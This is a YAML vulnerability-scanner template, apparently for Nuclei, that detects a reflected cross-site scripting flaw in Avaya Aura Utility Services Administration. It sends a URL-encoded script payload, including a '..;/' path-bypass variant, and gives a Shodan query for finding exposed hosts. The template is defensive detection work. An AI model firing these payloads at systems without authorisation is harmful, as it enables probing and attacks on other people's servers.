48 lines
1.7 KiB
YAML
48 lines
1.7 KiB
YAML
id: avaya-aura-xss
|
|
|
|
info:
|
|
name: Avaya Aura Utility Services Administration - Cross-Site Scripting
|
|
author: DhiyaneshDk
|
|
severity: medium
|
|
description: Avaya Aura Utility Services Administration contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
|
reference:
|
|
- https://blog.assetnote.io/2023/02/01/rce-in-avaya-aura/
|
|
- https://download.avaya.com/css/public/documents/101076366
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 5.4
|
|
cwe-id: CWE-80
|
|
cpe: cpe:2.3:a:avaya:aura_utility_services:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
shodan-query: html:"Avaya Aura"
|
|
product: aura_utility_services
|
|
vendor: avaya
|
|
tags: xss,avaya,aura,iot
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/admin/public/login.jsp?error=%3Cscript%3Ealert(document.domain)%3C/script%3e"
|
|
- "{{BaseURL}}/acs/..;/admin/public/login.jsp?error=%3Cscript%3Ealert(document.domain)%3C/script%3e"
|
|
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- '<script>alert(document.domain)</script>'
|
|
- 'Avaya Aura Device Services'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a004730450220160889dd28c2d6e9ed087993b270ee8f8a7056aaf2d7b94919a926a9d2a62c82022100cfb3fd8d1f2a9cb12fa1ee23a01a6b21462c6d4463d63879b03d62833604c95c:922c64590222798bb761d5b6d8e72950 |